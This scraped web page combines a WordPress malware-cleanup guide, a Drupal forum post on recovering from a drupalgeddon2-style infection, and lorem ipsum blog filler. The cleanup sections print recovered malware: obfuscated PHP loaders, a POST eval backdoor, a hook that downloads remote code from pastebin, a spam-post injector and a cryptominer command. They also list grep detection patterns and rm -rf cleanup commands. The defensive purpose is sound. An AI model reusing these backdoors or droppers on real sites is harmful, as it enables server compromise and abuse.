Prevent wordpress malware from infecting server

Effects:

1. www.wordpresssite.com/wp-admin

2. .htaccess

3. Unknown files & folders

4. Random articles in WP POST

5. Random admin users

Steps taken to prevent malware infection :

Image for post

Image for post

500      56861  0.0  0.2 222180 10936 ?        S    Sep23   0:00 /usr/bin/php /public_html/stylewpp.php500      56885  198  0.1  69408  8028 ?        Sl   Sep23 5940:27 ./cnrig -a cryptonight --donate-level 1 --max-cpu-usage 50 -o xmr.pool.minergate.com:45700 -u 4635633@mail.ru -p x --variant 1 -k
Image for post

Image for post

Image for post

Image for post

Image for post

Image for post

Image for post

Image for post

find ./ -type f -mtime -4
find -name index.php -exec rm -rf {} \;
find -name "*.ico"
find -name "*.ico" -exec rm -rf {} \;
<?php
include 'publ\151c_ht\155l/wp\055incl\165des/\122eque\163ts/A\165th/.\0619a92\071b9.i\143o';
find . -type f | egrep './[a-z]{8}\.php'
<?php
find . -type f -name '*.php' | xargs grep -l " *=PHP_VERSION *" 
find . -type f -name '*.php' | xargs grep -l " *Phar::interceptFileFuncs() *"
find . -type f -name '*.php' | xargs grep -l " *@include *" 
find . -type f -name '*.php' | xargs grep -l " *interceptFileFuncs *"
find . -type f -name '*.php' | xargs grep -l " *eval *( *gzinflate *( *base64_decode *( *"
find . -name "*.php" -exec grep -H "eval(" {} \;
find . -type f -name '*.php' | xargs grep -l "eval *("
find . -type f -name '*.php' | xargs grep -l " *base64_decode *"
find . -type f -name '*.php' | xargs grep -l " *function *wscandir *"
find . -type f -name '*.php' | xargs grep -l " *HTTP/1.0 *404 *Not *Found *"
find . -type f -name '*.php' | xargs grep -l " *@gzuncompress *" 
find . -type f -name '*.php' | xargs grep -l " *Array *( *) *; *global *" 
find . -type f -name '*.php' | xargs grep -l " *@unserialize *"
<php
$z0=$_REQUEST['sort'];$q1='';$c2="wt8m4;6eb39fxl*s5/.yj7(pod_h1kgzu0cqr)aniv2";$y3=array(8,38,15,7,6,4,26,25,7,34,24,25,7);foreach($y3 as $h4){$q1.=$c2[$h4];}$v5=strrev("noi"."tcnuf"."_eta"."erc");$j6=$v5("",$q1($z0));$j6();@require('wp-admin/A5');
$O_00_0OO_O='10196';$O0O_O__0O0='1';$O___OOO000='1';$OO_0O_00O_=("t1j7n80g4hbcesydpvxuimkf6_olz2a5q-w93r");$O0_00O_OO_=$OO_0O_00O_{16}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{7}.$OO_0O_00O_{25}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{16}.$OO_0O_00O_{27}.$OO_0O_00O_{30}.$OO_0O_00O_{11}.$OO_0O_00O_{12}.$OO_0O_00O_{25}.$OO_0O_00O_{11}.$OO_0O_00O_{30}.$OO_0O_00O_{27}.$OO_0O_00O_{27}.$OO_0O_00O_{10}.$OO_0O_00O_{30}.$OO_0O_00O_{11}.$OO_0O_00O_{22};$OO00_O0__O=$OO_0O_00O_{13}.$OO_0O_00O_{0}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{30}.$OO_0O_00O_{21}.$OO_0O_00O_{25}.$OO_0O_00O_{13}.$OO_0O_00O_{26}.$OO_0O_00O_{11}.$OO_0O_00O_{22}.$OO_0O_00O_{12}.$OO_0O_00O_{0}.$OO_0O_00O_{25}.$OO_0O_00O_{11}.$OO_0O_00O_{27}.$OO_0O_00O_{20}.$OO_0O_00O_{12}.$OO_0O_00O_{4}.$OO_0O_00O_{0};$OO0_0__O0O=$OO_0O_00O_{13}.$OO_0O_00O_{0}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_0O_00O_{30}.$OO_0O_00O_{21}.$OO_0O_00O_{25}.$OO_0O_00O_{7}.$OO_0O_00O_{12}.$OO_0O_00O_{0}.$OO_0O_00O_{25}.$OO_0O_00O_{21}.$OO_0O_00O_{12}.$OO_0O_00O_{0}.$OO_0O_00O_{30}.$OO_0O_00O_{25}.$OO_0O_00O_{15}.$OO_0O_00O_{30}.$OO_0O_00O_{0}.$OO_0O_00O_{30};$O_O_0_00OO=$OO_0O_00O_{13}.$OO_0O_00O_{0}.$OO_0O_00O_{37}.$OO_0O_00O_{12}.$OO_
<?php
include 'publ\151c_ht\155l/wp\055incl\165des/\122eque\163ts/A\165th/.\0619a92\071b9.i\143o';
<?php 
include 'public_html/wp-includes/Requests/Auth/.19a929b9.ico'; 
?>
<?php 
error_reporting(E_ERROR);set_time_limit(0);
if(isset($_POST['880051156510591875071'])){
 $tofile='407.php';
 $a =base64_decode(strtr($_POST['880051156510591875071'], '-_,', '+/=')); 
 $a='<?php '.$a.'?>';
 @file_put_contents($tofile,$a);
 require_once('407.php');
 @unlink($tofile);
 exit;}
?>
1. wp-load-5ba4acb3dcd415ba4acb3dcdc6.php
2. wp-settings-5ba4acb0b6fbb5ba4acb0b7027
185.183.96.159 - - [25/Sep/2018:03:15:45 +0100] "GET /?key=uploadUpdate&url=key=uploadUpdate&url=https%3A%2F%2Fpastebin.com%2Fraw%2FsYtyF6ag&file_name=wp-settings-5bac3e81089ad5bac3e8108a05
 HTTP/1.1" 200 53523 "http://mydomain.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"185.183.96.159 - - [25/Sep/2018:03:15:45 +0100] "POST /wp-settings-5bac3e81089ad5bac3e8108a05.php HTTP/1.1" 200 7499 "http://mydomain.com" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.92 Safari/537.36"
key=uploadUpdate&url=https%3A%2F%2Fpastebin.com%2Fraw%2FsYtyF6ag&file_name=wp-settings-5bac3e81089ad5bac3e8108a05
add_action('init', 'wordpress_download');function wordpress_download(){if($_GET['key']=='uploadUpdate'){function wordpress_file_func($path, $data){file_put_contents($path, '<?php /*'.uniqid().'*/ ?>'.$data);}$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $_GET['url']);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch,CURLOPT_TIMEOUT,60);$data = curl_exec($ch);$dsdsvxz = $data.'';wordpress_file_func($_SERVER["DOCUMENT_ROOT"].'/'.$_GET['file_name'].'.php', $dsdsvxz);}}
if (array_key_exists ('article', $_REQUEST)){$load_path = get_load_path ();require_once ($load_path);print "#loaded wp-load#\n";list ($content, $title) = get_article ();$post_id = wp_insert_post (array('post_title' => $title,'post_content' => $content,'post_status' => 'publish','post_date' => date('Y-m-d H:i:s'),'post_author' => get_admin_id (),'post_type' => 'post','post_category' => array(0)));if ($post_id){$link = get_permalink($post_id);print "#Created post_id: !$post_id!$link!#\n";}else{print "#Unable to create new post#\n";}}echo "#Failed: $post_link#\n";}}?>
Image for post

Image for post

# BEGIN protect xmlrpc.php
<files xmlrpc.php>
order allow,deny
deny from all
</files>
# END protect xmlrpc.php
chmod -R u+rwX,go+rX,go-w /path
find . -type d -exec chmod 755 {} \;
find . -type f -exec chmod 644 {} \;
/wp-content/uploads/revslider/templates/techco-menu/wp-rewrite.php
Image for post

Image for post

Conclusion :

Source: medium.com

Maleware, Monit.php, ico file hack, index.php hack

I believe I finally got the upper hand on this attack. From what I’m reading on-line it was part of the drupalgeddon2 exploits. I didn’t upgrade to 7.59 fast enough. People are claiming you should scrap your sites and servers over this. Not willing to do that. You may not be able to clean this attack if you do not have WHM root access.

This hack is characterized by a few things:
1. Admin accounts you didn’t make showing up.
2. Roles you didn’t make showing up.
3. Malicious “ico” files showing up on the server with php code in them.
4. Random php files showing up across the site directories.
5. A lot of extra “index.php” file showing up across the site.
6. php and inc files that have been modified with obfuscated code.
7. Cross-site infections on a shared WHM. Infected files in the home/cpeasyapache directory.

Some are saying there are “back doors” made where the hackers are getting in. I highly doubted this after patching to 7.59 as the malicious admin accounts were not showing back up. What was happening is that the “ico” files were popping up every 5 – 10 hours, and these in turn were creating a bunch of random string php files and index.php files that pointed back to the ico file. This code seemed to be able to affect multiple sites sharing the same WHM.

Steps to fix the hack without trashing your sites:

Prep:
1. Backup your site and database, put site into maintenance mode.
2. Make sure you have SSH access to your WHM or Cpanel
3. Login to site and remove any malicious admin accounts.
4. Remove any roles you didn’t make.
5. From cpannel, using phpmyadmin, look at your database tables for users and roles, delete any tables you know shouldn’t be there. (user 0 is supposed to be there)
6. Change all database and user passwords.




Fix:
1. From SSH. run a query from the public_html folder like this:

find -name index.php

If you see a shitload of files come up on Drupal, you are hacked. There is only supposed to be 1 index.php.2. Delete ALL of the index.php files with this command:

find -name index.php -exec rm -rf {} \;

We will replace the main index.php file when we update to the newest Drupal.3. Search for icon files that don’t belong with this command:

find -name "*.ico"

If you see a bunch of strange icon files starting with a . and having a random string, they are php files. I just removed all icon files as I don’t give a shit about them with:

find -name "*.ico" -exec rm -rf {} \;

If you want to keep your icon files, just manually delete the suspicious ones with ftp.I’m reading that there were also files other than .ico that were associated with this hack. An easy to way to identify which extension they are using is to open up one of your hacked index.php files and copy this line of text:

@include "\057h\157m\145/\147l\145n\143c\057p\165b\154i\143_\150t\155l\057p\162o\146i\154e\163/\164e\163t\151n\147/\0564\0621\142e\071a\067.\151c\157";

Paste it here: Unphp.net

It will tell you which malicious file it is pointed at. Use that information to remove all of the files of that type using the SSH command above but for the malicious extension instead of .ico.




4. Find the other malicious php files that don’t belong. On my site, they were all php files with 8 a-z character names. Like dkelfesa.php or something. Use this regex to look for 8 character php files:

find . -type f | egrep './[a-z]{8}\.php'

Remove any you suspect are malicious. Typically the name wont make any sense. If you open them and see a punch of php code you cant read, they are malicious.5. After doing all of that, I was still getting hacked and couldn’t figure it out. I decided to open my database for the site in phpMyAdmin and run a search on all tables for:

<?php

to look for any malicious php code I had missed. It turns out that when the original hack happened the hacker had used the admin account to created a block called “Development”. He gave it no title, and in the body inserted his malicious php code. He then enabled this on the site. He could remotely call it and it would reinfect the site with the ico files, the index.php files, and the random string php files. Run a database search for the php tag above and look at all results for malicious code across your site in content nodes or blocks. Remove any code you can’t easily read.6. There were also quite a few php and inc files across the Drupal installation that had either been modified with malicious php at the top of the file, or just didn’t belong. They were cleverly named and stashed away into modules folders, library folders, everywhere. As I discovered them I created these grep patters to help others find them. Unfortunately I found 4 malicious files in the /home/cpeasyapache directory. These looked to have the ability to scan all sites on the shared host and infect them all. Use these searches at the WHM root level to look for malicious php and inc files. Remove or clean them.

find . -type f -name '*.php' | xargs grep -l " *=PHP_VERSION *" 
find . -type f -name '*.php' | xargs grep -l " *Phar::interceptFileFuncs() *"
find . -type f -name '*.php' | xargs grep -l " *@include *" 
find . -type f -name '*.php' | xargs grep -l " *interceptFileFuncs *"
find . -type f -name '*.php' | xargs grep -l " *eval *( *gzinflate *( *base64_decode *( *"
find . -type f -name '*.php' | xargs grep -l " *base64_decode *"
find . -type f -name '*.php' | xargs grep -l " *function *wscandir *"
find . -type f -name '*.php' | xargs grep -l " *HTTP/1.0 *404 *Not *Found *"
find . -type f -name '*.php' | xargs grep -l " *@gzuncompress *" 
find . -type f -name '*.php' | xargs grep -l " *Array *( *) *; *global *" 
find . -type f -name '*.php' | xargs grep -l " *@unserialize *"

If you don’t have access to your root, contact your host provider to have them scan it for the above patterns to remove the malicious files.

Here is an example of some malicious code found in a file in the /cpeasyapachy directory of the WHM root:

The full file had some functions that scanned the root, looked for inc and php files, changed folder permissions, and created the index.php files. There were 4 files in the cpeasyapache directory that looked similar to this:
Malicious.txt

Wrap up:
Once you have done this. Download the latest version of Drupal and copy it over to your site. This will replace the main index.php file and your site should be up and working again.

Install latest modules.

Run update.php

Lastly, check the file permission settings in the public_html folder. Directories should be set to 740 and files to 644. A quick way to do this is:
find . -type d -exec chmod 740 {} \;
find . -type f -exec chmod 644 {} \;

Once done, install the “Hacked” module to inspect your site for changes associated with this hack.

Other good modules are login security, and path2ban.

Clear all site caches and web browser history / caches.

Cheers

Understanding How to Design Your Website Webinar FAQs

Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore agna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco oris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate elit esse cillum dolore eu fugiat nulla pariatur excepteur sint ecat.

Continue reading “Understanding How to Design Your Website Webinar FAQs”

Powerful Web Hosting with WordPress Optimized Solution Available.


Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore agna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco oris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate elit esse cillum dolore eu fugiat nulla pariatur excepteur sint ecat.

Continue reading “Powerful Web Hosting with WordPress Optimized Solution Available.”

How to Build a WordPress Membership Site the Easy Way


Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore agna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco oris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate elit esse cillum dolore eu fugiat nulla pariatur excepteur sint ecat.

Continue reading “How to Build a WordPress Membership Site the Easy Way”

Ratione Quo Non Possimus Rer industry’s

Curabitur pulvinar euismod ante, ac sagittis ante posuere ac. Vivamus luctus commodo dolor porta feugiat. Fusce at velit id ligula pharetra laoreet. Ut nec metus a mi ullamcorper hendrerit. Nulla facilisi. Pellentesque sed nibh a quam accumsan dignissim quis quis urna. The most happiest time of the day!. Praesent id dolor dui, dapibus gravida elit. Donec consequat laoreet sagittis. Suspendisse ultricies ultrices viverra. Morbi rhoncus laoreet tincidunt. Mauris interdum convallis metus.

The world is a dangerous place to live; not because of the people who are evil, but because of the people who don’t do anything about it.

By : Albert Einstein

The most happiest time of the day!. Praesent id dolor dui, dapibus gravida elit. Donec consequat laoreet sagittis. Suspendisse ultricies ultrices viverra. Morbi rhoncus laoreet tincidunt. Mauris interdum convallis metus. Suspendisse vel lacus est, sit amet tincidunt erat. Etiam purus sem, euismod eu vulputate eget, porta quis sapien. Donec tellus est, rhoncus vel scelerisque id, iaculis eu nibh.

Donec posuere bibendum metus. Quisque gravida luctus volutpat. Mauris interdum, lectus in dapibus molestie, quam felis sollicitudin mauris, sit amet tempus velit lectus nec lorem. Nullam vel mollis neque. The most happiest time of the day!. Nullam vel enim dui. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Sed tincidunt accumsan massa id viverra. Sed sagittis, nisl sit amet imperdiet convallis, nunc tortor consequat tellus, vel molestie neque nulla non ligula. Proin tincidunt tellus ac porta volutpat. Cras mattis congue lacus id bibendum. Mauris ut sodales libero. Maecenas feugiat sit amet enim in accumsan.

Duis vestibulum quis quam vel accumsan. Nunc a vulputate lectus. Vestibulum eleifend nisl sed massa sagittis vestibulum. Vestibulum pretium blandit tellus, sodales volutpat sapien varius vel. Phasellus tristique cursus erat, a placerat tellus laoreet eget. Fusce vitae dui sit amet lacus rutrum convallis. Vivamus sit amet lectus venenatis est rhoncus interdum a vitae velit.